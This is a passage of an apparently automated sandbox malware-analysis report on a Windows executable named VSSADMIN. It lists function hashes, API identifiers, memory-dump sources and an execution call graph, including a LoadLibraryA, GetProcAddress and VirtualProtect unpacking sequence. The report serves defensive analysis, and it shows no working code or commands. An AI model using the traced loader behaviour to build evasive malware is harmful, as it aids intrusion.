                                                                                                                                                                      • Instruction Fuzzy Hash: 3621B172A08A8282EB209B15D48427E63B1FB86F64F454037DA8DC3684DF7DE985DB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: Fatal error detected
                                                                                                                                                                      • API String ID: 1878133881-4025702859
                                                                                                                                                                      • Opcode ID: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                      • Instruction ID: a49303f06f8780b8e014b4f9c7065a12ecf7965e4abde25aa76fce8a106fb723
                                                                                                                                                                      • Opcode Fuzzy Hash: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                      • Instruction Fuzzy Hash: D821A67262CA8292EB20DB14F4906EA7374FF95B98F805136E64D87A65DF3DD245C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error detected
• API String ID: 1878133881-3513342764
• Opcode ID: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
• Instruction ID: e4213435244b9469cfa5219e9e3788d136793a4e1cb18b9816c5f1dd7773f744
• Opcode Fuzzy Hash: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
• Instruction Fuzzy Hash: BA21867262CA8292EB20D714F4916EAB374FF95B98F805136E68D87A65DF3DD205C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
• Instruction ID: fec1f0a4ab71d96dae5c7cde083ccec8d9e5605f7e08bb13d27bbcb3617339c3
• Opcode Fuzzy Hash: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
• Instruction Fuzzy Hash: A8113D32608F8182EB158F15F48026977A4FB89FA8F184235DF8D47764DF3DD5518700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
• Instruction ID: c4f82c2235458d99cb60745b9e31a72a69d7a9732c52fc391b20815b90c59dec
• Opcode Fuzzy Hash: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
• Instruction Fuzzy Hash: C1018461A1CA438AFB209F6094E127E63B0EF46B68F440137D74DC7691EF2DE545DA18
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1%
Total number of Nodes: 819
Total number of Limit Nodes: 10
                                                                                                                                                                      execution_graph 66229 7ffd3ff45510 66230 7ffd3ff460b1 66229->66230 66237 7ffd3ff45528 66229->66237 66231 7ffd3ff45fbe LoadLibraryA 66232 7ffd3ff45fd8 66231->66232 66235 7ffd3ff45ff7 GetProcAddress 66232->66235 66232->66237 66234 7ffd3ff46019 VirtualProtect VirtualProtect 66234->66230 66235->66232 66236 7ffd3ff4600e 66235->66236 66237->66231 66237->66234 66238 7ff614c7b1cc 66263 7ff614c7b39c 66238->66263 66241 7ff614c7b318 66367 7ff614c7b6cc 7 API calls 2 library calls 66241->66367 66242 7ff614c7b1e8 __scrt_acquire_startup_lock 66244 7ff614c7b322 66242->66244 66245 7ff614c7b206 66242->66245 66368 7ff614c7b6cc 7 API calls 2 library calls 66244->66368 66255 7ff614c7b248 __scrt_release_startup_lock 66245->66255 66271 7ff614c886a4 66245->66271 66249 7ff614c7b22b 66251 7ff614c7b32d __CxxCallCatchBlock 66252 7ff614c7b2b1 66279 7ff614c7b818 66252->66279 66254 7ff614c7b2b6 66282 7ff614c71000 66254->66282 66255->66252 66364 7ff614c889b4 45 API calls 66255->66364 66260 7ff614c7b2d9 66260->66251 66366 7ff614c7b530 7 API calls __scrt_initialize_crt 66260->66366 66262 7ff614c7b2f0 66262->66249 66369 7ff614c7b99c 66263->66369 66266 7ff614c7b3cb 66371 7ff614c890bc 66266->66371 66267 7ff614c7b1e0 66267->66241 66267->66242 66273 7ff614c886b7 66271->66273 66272 7ff614c7b227 66272->66249 66275 7ff614c88660 66272->66275 66273->66272 66388 7ff614c7b0e0 66273->66388 66276 7ff614c88696 66275->66276 66277 7ff614c88665 66275->66277 66276->66255 66277->66276 66463 7ff614c7b1b0 66277->66463 66472 7ff614c7c240 66279->66472 66281 7ff614c7b82f GetStartupInfoW 66281->66254 66283 7ff614c7100b 66282->66283 66474 7ff614c77630 66283->66474 66285 7ff614c7101d 66481 7ff614c84f44 66285->66481 66287 7ff614c7369b 66488 7ff614c71af0 66287->66488 66293 7ff614c736b9 66355 7ff614c737ba 66293->66355 66504 7ff614c73b40 66293->66504 66295 
7ff614c736eb 66295->66355 66507 7ff614c769b0 66295->66507 66297 7ff614c73707 66298 7ff614c769b0 61 API calls 66297->66298 66313 7ff614c73753 66297->66313 66305 7ff614c73728 __std_exception_copy 66298->66305 66300 7ff614c73768 66526 7ff614c719d0 66300->66526 66303 7ff614c7385d 66306 7ff614c73888 66303->66306 66636 7ff614c732a0 59 API calls 66303->66636 66304 7ff614c719d0 121 API calls 66307 7ff614c7379e 66304->66307 66308 7ff614c76fc0 58 API calls 66305->66308 66305->66313 66316 7ff614c738cb 66306->66316 66537 7ff614c77a60 66306->66537 66311 7ff614c737a2 66307->66311 66312 7ff614c737e0 66307->66312 66308->66313 66602 7ff614c72770 59 API calls 2 library calls 66311->66602 66312->66303 66612 7ff614c73cd0 66312->66612 66522 7ff614c76fc0 66313->66522 66314 7ff614c738a8 66317 7ff614c738ad 66314->66317 66318 7ff614c738be SetDllDirectoryW 66314->66318 66551 7ff614c75e60 66316->66551 66637 7ff614c72770 59 API calls 2 library calls 66317->66637 66318->66316 66324 7ff614c73802 66635 7ff614c72770 59 API calls 2 library calls 66324->66635 66328 7ff614c738e8 66352 7ff614c7391a 66328->66352 66639 7ff614c75660 161 API calls 3 library calls 66328->66639 66329 7ff614c73830 66329->66303 66330 7ff614c73835 66329->66330 66631 7ff614c7f2dc 66330->66631 66331 7ff614c739e6 66592 7ff614c73130 66331->66592 66335 7ff614c738f9 66338 7ff614c7391c 66335->66338 66640 7ff614c755e0 91 API calls 66335->66640 66337 7ff614c73939 66344 7ff614c73985 66337->66344 66643 7ff614c71b30 66337->66643 66642 7ff614c758b0 FreeLibrary 66338->66642 66343 7ff614c73a1b 66346 7ff614c769b0 61 API calls 66343->66346 66344->66355 66555 7ff614c730d0 66344->66555 66345 7ff614c73907 66345->66338 66348 7ff614c7390b 66345->66348 66350 7ff614c73a27 66346->66350 66641 7ff614c75cb0 60 API calls 66348->66641 66353 7ff614c73a38 66350->66353 66350->66355 66351 7ff614c739c1 66647 7ff614c758b0 FreeLibrary 66351->66647 66352->66331 66352->66337 66649 7ff614c77000 63 API calls 2 library calls 66353->66649 66603 7ff614c7adb0 
66355->66603 66357 7ff614c73a50 66650 7ff614c758b0 FreeLibrary 66357->66650 66359 7ff614c73a77 66652 7ff614c71ab0 74 API calls __std_exception_copy 66359->66652 66360 7ff614c73a5c 66360->66359 66651 7ff614c76cc0 67 API calls 2 library calls 66360->66651 66363 7ff614c73a7f 66363->66355 66364->66252 66365 7ff614c7b85c GetModuleHandleW 66365->66260 66366->66262 66367->66244 66368->66251 66370 7ff614c7b3be __scrt_dllmain_crt_thread_attach 66369->66370 66370->66266 66370->66267 66372 7ff614c925fc 66371->66372 66373 7ff614c7b3d0 66372->66373 66376 7ff614c8ba20 66372->66376 66373->66267 66375 7ff614c7caf8 7 API calls 2 library calls 66373->66375 66375->66267 66387 7ff614c8f7b8 EnterCriticalSection 66376->66387 66378 7ff614c8ba30 66379 7ff614c86b74 43 API calls 66378->66379 66380 7ff614c8ba39 66379->66380 66381 7ff614c8ba47 66380->66381 66382 7ff614c8b828 45 API calls 66380->66382 66383 7ff614c8f818 _isindst LeaveCriticalSection 66381->66383 66384 7ff614c8ba42 66382->66384 66385 7ff614c8ba53 66383->66385 66386 7ff614c8b918 GetStdHandle GetFileType 66384->66386 66385->66372 66386->66381 66389 7ff614c7b0f0 66388->66389 66405 7ff614c857cc 66389->66405 66391 7ff614c7b0fc 66411 7ff614c7b3e8 66391->66411 66394 7ff614c7b195 66394->66273 66395 7ff614c7b114 _RTC_Initialize 66403 7ff614c7b169 66395->66403 66416 7ff614c7b598 66395->66416 66397 7ff614c7b129 66419 7ff614c87e9c 66397->66419 66401 7ff614c7b13e 66402 7ff614c88ab0 45 API calls 66401->66402 66402->66403 66404 7ff614c7b185 66403->66404 66445 7ff614c7b6cc 7 API calls 2 library calls 66403->66445 66404->66273 66406 7ff614c857dd 66405->66406 66407 7ff614c857e5 66406->66407 66446 7ff614c84474 11 API calls _set_fmode 66406->66446 66407->66391 66409 7ff614c857f4 66447 7ff614c89de0 37 API calls _invalid_parameter_noinfo 66409->66447 66412 7ff614c7b3f9 66411->66412 66415 7ff614c7b3fe __scrt_acquire_startup_lock 66411->66415 66412->66415 66448 7ff614c7b6cc 7 API calls 2 library calls 66412->66448 66414 7ff614c7b472 66415->66395 66449 
7ff614c7b55c 66416->66449 66418 7ff614c7b5a1 66418->66397 66420 7ff614c87ebc 66419->66420 66421 7ff614c7b135 66419->66421 66422 7ff614c87eda GetModuleFileNameW 66420->66422 66423 7ff614c87ec4 66420->66423 66421->66403 66444 7ff614c7b66c InitializeSListHead 66421->66444 66427 7ff614c87f05 66422->66427 66454 7ff614c84474 11 API calls _set_fmode 66423->66454 66425 7ff614c87ec9 66455 7ff614c89de0 37 API calls _invalid_parameter_noinfo 66425->66455 66456 7ff614c87e3c 11 API calls 2 library calls 66427->66456 66429 7ff614c87f45 66430 7ff614c87f4d 66429->66430 66434 7ff614c87f65 66429->66434 66457 7ff614c84474 11 API calls _set_fmode 66430->66457 66432 7ff614c87f52 66458 7ff614c89e48 11 API calls 2 library calls 66432->66458 66437 7ff614c87fb3 66434->66437 66439 7ff614c87fcc 66434->66439 66443 7ff614c87f87 66434->66443 66435 7ff614c87f60 66435->66421 66459 7ff614c89e48 11 API calls 2 library calls 66437->66459 66439->66439 66461 7ff614c89e48 11 API calls 2 library calls 66439->66461 66440 7ff614c87fbc 66460 7ff614c89e48 11 API calls 2 library calls 66440->66460 66462 7ff614c89e48 11 API calls 2 library calls 66443->66462 66445->66394 66446->66409 66448->66414 66450 7ff614c7b576 66449->66450 66452 7ff614c7b56f 66449->66452 66453 7ff614c88f1c 40 API calls 66450->66453 66452->66418 66453->66452 66454->66425 66456->66429 66457->66432 66458->66435 66459->66440 66460->66435 66461->66443 66462->66421 66471 7ff614c7b8b0 SetUnhandledExceptionFilter 66463->66471 66473 7ff614c7c220 66472->66473 66473->66281 66473->66473 66476 7ff614c7764f 66474->66476 66475 7ff614c776a0 WideCharToMultiByte 66475->66476 66478 7ff614c77748 66475->66478 66476->66475 66477 7ff614c776f6 WideCharToMultiByte 66476->66477 66476->66478 66480 7ff614c77657 __std_exception_copy 66476->66480 66477->66476 66477->66478 66653 7ff614c72620 57 API calls 2 library calls 66478->66653 66480->66285 66482 7ff614c8ec70 66481->66482 66484 7ff614c8ed16 66482->66484 66485 7ff614c8ecc3 66482->66485 66655 7ff614c8eb48 71 API 
calls _fread_nolock 66484->66655 66654 7ff614c89d14 37 API calls 2 library calls 66485->66654 66487 7ff614c8ecec 66487->66287 66489 7ff614c71b05 66488->66489 66490 7ff614c71b20 66489->66490 66656 7ff614c724d0 59 API calls 3 library calls 66489->66656 66490->66355 66492 7ff614c73bc0 66490->66492 66657 7ff614c7ade0 66492->66657 66495 7ff614c73bfb 66659 7ff614c72620 57 API calls 2 library calls 66495->66659 66496 7ff614c73c12 66660 7ff614c77b70 59 API calls 66496->66660 66499 7ff614c73c0e 66502 7ff614c7adb0 _wfindfirst32i64 8 API calls 66499->66502 66500 7ff614c73c25 66500->66499 66661 7ff614c72770 59 API calls 2 library calls 66500->66661 66503 7ff614c73c4f 66502->66503 66503->66293 66505 7ff614c71b30 49 API calls 66504->66505 66506 7ff614c73b5d 66505->66506 66506->66295 66508 7ff614c769ba 66507->66508 66509 7ff614c77a60 57 API calls 66508->66509 66510 7ff614c769dc GetEnvironmentVariableW 66509->66510 66511 7ff614c76a46 66510->66511 66512 7ff614c769f4 ExpandEnvironmentStringsW 66510->66512 66513 7ff614c7adb0 _wfindfirst32i64 8 API calls 66511->66513 66662 7ff614c77b70 59 API calls 66512->66662 66515 7ff614c76a58 66513->66515 66515->66297 66516 7ff614c76a1c 66516->66511 66517 7ff614c76a26 66516->66517 66663 7ff614c8913c 37 API calls 2 library calls 66517->66663 66519 7ff614c76a2e 66520 7ff614c7adb0 _wfindfirst32i64 8 API calls 66519->66520 66521 7ff614c76a3e 66520->66521 66521->66297 66523 7ff614c77a60 57 API calls 66522->66523 66524 7ff614c76fd7 SetEnvironmentVariableW 66523->66524 66525 7ff614c76fef __std_exception_copy 66524->66525 66525->66300 66527 7ff614c71b30 49 API calls 66526->66527 66528 7ff614c71a00 66527->66528 66529 7ff614c71b30 49 API calls 66528->66529 66535 7ff614c71a7a 66528->66535 66530 7ff614c71a22 66529->66530 66531 7ff614c73b40 49 API calls 66530->66531 66530->66535 66532 7ff614c71a3b 66531->66532 66664 7ff614c717b0 66532->66664 66535->66303 66535->66304 66536 7ff614c7f2dc 74 API calls 66536->66535 66538 7ff614c77b07 MultiByteToWideChar 
66537->66538 66539 7ff614c77a81 MultiByteToWideChar 66537->66539 66540 7ff614c77b2a 66538->66540 66541 7ff614c77b4f 66538->66541 66542 7ff614c77acc 66539->66542 66543 7ff614c77aa7 66539->66543 66749 7ff614c72620 57 API calls 2 library calls 66540->66749 66541->66314 66542->66538 66548 7ff614c77ae2 66542->66548 66747 7ff614c72620 57 API calls 2 library calls 66543->66747 66546 7ff614c77b3d 66546->66314 66547 7ff614c77aba 66547->66314 66748 7ff614c72620 57 API calls 2 library calls 66548->66748 66550 7ff614c77af5 66550->66314 66552 7ff614c75e75 66551->66552 66553 7ff614c738d0 66552->66553 66750 7ff614c724d0 59 API calls 3 library calls 66552->66750 66553->66352 66638 7ff614c75b00 122 API calls 2 library calls 66553->66638 66751 7ff614c74980 66555->66751 66558 7ff614c7311d 66558->66351 66560 7ff614c730f4 66560->66558 66807 7ff614c74700 66560->66807 66562 7ff614c73100 66562->66558 66817 7ff614c74860 66562->66817 66564 7ff614c7310c 66564->66558 66565 7ff614c7335c 66564->66565 66566 7ff614c73347 66564->66566 66568 7ff614c7337c 66565->66568 66579 7ff614c73392 __std_exception_copy 66565->66579 66848 7ff614c72770 59 API calls 2 library calls 66566->66848 66849 7ff614c72770 59 API calls 2 library calls 66568->66849 66569 7ff614c7adb0 _wfindfirst32i64 8 API calls 66571 7ff614c734ea 66569->66571 66571->66351 66574 7ff614c71b30 49 API calls 66574->66579 66575 7ff614c7362b 66857 7ff614c72770 59 API calls 2 library calls 66575->66857 66577 7ff614c73605 66856 7ff614c72770 59 API calls 2 library calls 66577->66856 66579->66574 66579->66575 66579->66577 66580 7ff614c734f6 66579->66580 66591 7ff614c73353 __std_exception_copy 66579->66591 66822 7ff614c712b0 66579->66822 66850 7ff614c71780 59 API calls 66579->66850 66581 7ff614c73562 66580->66581 66851 7ff614c8913c 37 API calls 2 library calls 66580->66851 66852 7ff614c716d0 59 API calls 66581->66852 66584 7ff614c73584 66585 7ff614c73589 66584->66585 66586 7ff614c73597 66584->66586 66853 7ff614c8913c 37 API calls 2 library calls 
66585->66853 66854 7ff614c72ec0 37 API calls 66586->66854 66589 7ff614c73595 66855 7ff614c723b0 62 API calls __std_exception_copy 66589->66855 66591->66569 66594 7ff614c731e4 66592->66594 66599 7ff614c731a3 66592->66599 66593 7ff614c73223 66596 7ff614c7adb0 _wfindfirst32i64 8 API calls 66593->66596 66594->66593 67029 7ff614c71ab0 74 API calls __std_exception_copy 66594->67029 66597 7ff614c73235 66596->66597 66597->66355 66648 7ff614c76f50 57 API calls __std_exception_copy 66597->66648 66599->66594 66973 7ff614c729b0 66599->66973 67028 7ff614c71440 161 API calls 2 library calls 66599->67028 67030 7ff614c71780 59 API calls 66599->67030 66602->66355 66604 7ff614c7adb9 66603->66604 66605 7ff614c737ce 66604->66605 66606 7ff614c7ae70 IsProcessorFeaturePresent 66604->66606 66605->66365 66607 7ff614c7ae88 66606->66607 67128 7ff614c7b064 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 66607->67128 66609 7ff614c7ae9b 67129 7ff614c7ae30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 66609->67129 66613 7ff614c73cdc 66612->66613 66614 7ff614c77a60 57 API calls 66613->66614 66615 7ff614c73d07 66614->66615 66616 7ff614c77a60 57 API calls 66615->66616 66617 7ff614c73d1a 66616->66617 67130 7ff614c854f8 66617->67130 66620 7ff614c7adb0 _wfindfirst32i64 8 API calls 66621 7ff614c737fa 66620->66621 66621->66324 66622 7ff614c77230 66621->66622 66623 7ff614c77254 66622->66623 66624 7ff614c7f964 73 API calls 66623->66624 66629 7ff614c7732b __std_exception_copy 66623->66629 66625 7ff614c7726e 66624->66625 66625->66629 67298 7ff614c87968 66625->67298 66627 7ff614c7f964 73 API calls 66630 7ff614c77283 66627->66630 66628 7ff614c7f62c _fread_nolock 53 API calls 66628->66630 66629->66329 66630->66627 66630->66628 66630->66629 66632 7ff614c7f30c 66631->66632 67314 7ff614c7f0b8 66632->67314 66634 7ff614c7f325 66634->66324 66635->66355 66636->66306 66637->66355 66638->66328 66639->66335 66640->66345 66641->66352 66642->66352 66644 7ff614c71b55 
66643->66644 66645 7ff614c83c14 49 API calls 66644->66645 66646 7ff614c71b78 66645->66646 66646->66344 66647->66355 66648->66343 66649->66357 66650->66360 66651->66359 66652->66363 66653->66480 66654->66487 66655->66487 66656->66490 66658 7ff614c73bcc GetModuleFileNameW 66657->66658 66658->66495 66658->66496 66659->66499 66660->66500 66661->66499 66662->66516 66663->66519 66665 7ff614c717d4 66664->66665 66666 7ff614c717e4 66664->66666 66667 7ff614c73cd0 116 API calls 66665->66667 66668 7ff614c77230 83 API calls 66666->66668 66694 7ff614c71842 66666->66694 66667->66666 66669 7ff614c71815 66668->66669 66669->66694 66698 7ff614c7f964 66669->66698 66671 7ff614c7adb0 _wfindfirst32i64 8 API calls 66673 7ff614c719c0 66671->66673 66672 7ff614c7182b 66674 7ff614c7184c 66672->66674 66675 7ff614c7182f 66672->66675 66673->66535 66673->66536 66702 7ff614c7f62c 66674->66702 66711 7ff614c724d0 59 API calls 3 library calls 66675->66711 66679 7ff614c71867 66712 7ff614c724d0 59 API calls 3 library calls 66679->66712 66680 7ff614c7f964 73 API calls 66682 7ff614c718d1 66680->66682 66683 7ff614c718e3 66682->66683 66684 7ff614c718fe 66682->66684 66713 7ff614c724d0 59 API calls 3 library calls 66683->66713 66685 7ff614c7f62c _fread_nolock 53 API calls 66684->66685 66687 7ff614c71913 66685->66687 66687->66679 66688 7ff614c71925 66687->66688 66705 7ff614c7f3a0 66688->66705 66691 7ff614c7193d 66714 7ff614c72770 59 API calls 2 library calls 66691->66714 66693 7ff614c71993 66693->66694 66695 7ff614c7f2dc 74 API calls 66693->66695 66694->66671 66695->66694 66696 7ff614c71950 66696->66693 66715 7ff614c72770 59 API calls 2 library calls 66696->66715 66699 7ff614c7f994 66698->66699 66716 7ff614c7f6f4 66699->66716 66701 7ff614c7f9ad 66701->66672 66729 7ff614c7f64c 66702->66729 66706 7ff614c71939 66705->66706 66707 7ff614c7f3a9 66705->66707 66706->66691 66706->66696 66745 7ff614c84474 11 API calls _set_fmode 66707->66745 66709 7ff614c7f3ae 66746 7ff614c89de0 37 API calls _invalid_parameter_noinfo 
66709->66746 66711->66694 66712->66694 66713->66694 66714->66694 66715->66693 66717 7ff614c7f75e 66716->66717 66718 7ff614c7f71e 66716->66718 66717->66718 66720 7ff614c7f76a 66717->66720 66728 7ff614c89d14 37 API calls 2 library calls 66718->66728 66727 7ff614c8431c EnterCriticalSection 66720->66727 66721 7ff614c7f745 66721->66701 66723 7ff614c7f76f 66724 7ff614c7f878 71 API calls 66723->66724 66725 7ff614c7f781 66724->66725 66726 7ff614c84328 _fread_nolock LeaveCriticalSection 66725->66726 66726->66721 66728->66721 66730 7ff614c7f676 66729->66730 66731 7ff614c71861 66729->66731 66730->66731 66732 7ff614c7f685 __scrt_get_show_window_mode 66730->66732 66733 7ff614c7f6c2 66730->66733 66731->66679 66731->66680 66743 7ff614c84474 11 API calls _set_fmode 66732->66743 66742 7ff614c8431c EnterCriticalSection 66733->66742 66735 7ff614c7f6ca 66737 7ff614c7f3cc _fread_nolock 51 API calls 66735->66737 66739 7ff614c7f6e1 66737->66739 66738 7ff614c7f69a 66744 7ff614c89de0 37 API calls _invalid_parameter_noinfo 66738->66744 66741 7ff614c84328 _fread_nolock LeaveCriticalSection 66739->66741 66741->66731 66743->66738 66745->66709 66747->66547 66748->66550 66749->66546 66750->66553 66752 7ff614c74990 66751->66752 66753 7ff614c71b30 49 API calls 66752->66753 66754 7ff614c749c2 66753->66754 66755 7ff614c749eb 66754->66755 66756 7ff614c749cb 66754->66756 66758 7ff614c74a42 66755->66758 66858 7ff614c73d50 66755->66858 66871 7ff614c72770 59 API calls 2 library calls 66756->66871 66759 7ff614c73d50 49 API calls 66758->66759 66762 7ff614c74a5b 66759->66762 66760 7ff614c749e1 66764 7ff614c7adb0 _wfindfirst32i64 8 API calls 66760->66764 66765 7ff614c74a79 66762->66765 66873 7ff614c72770 59 API calls 2 library calls 66762->66873 66763 7ff614c74a0c 66766 7ff614c74a2a 66763->66766 66872 7ff614c72770 59 API calls 2 library calls 66763->66872 66767 7ff614c730de 66764->66767 66867 7ff614c771e0 66765->66867 66861 7ff614c73c60 66766->66861 66767->66558 66779 7ff614c74d00 66767->66779 66772 
APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: c193deae2c68f2782aecede26064aa5b5da501404692e974333340cb25ef943d
• Instruction ID: b68f983b892a7b5db8c62fe9801dbb15b0ac0717b6815dec5b91bd7101bebb8a
• Opcode Fuzzy Hash: c193deae2c68f2782aecede26064aa5b5da501404692e974333340cb25ef943d
• Instruction Fuzzy Hash: AFC1AD37B28E4295EB10CF68C4D06AC3771EB5AFA8B01523ADA2E97795DF3AD551C300
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID: v25
• API String ID: 3300690313-352214434
• Opcode ID: 81e439c2f95b6ff207ce10fa622c9e2eedcd61100e367f92fc92251c239f3918
• Instruction ID: 38d6fe9c059d25f0eba26e28a72433fc53c93fcdf728bfa46f544aa6523488d4
• Opcode Fuzzy Hash: 81e439c2f95b6ff207ce10fa622c9e2eedcd61100e367f92fc92251c239f3918
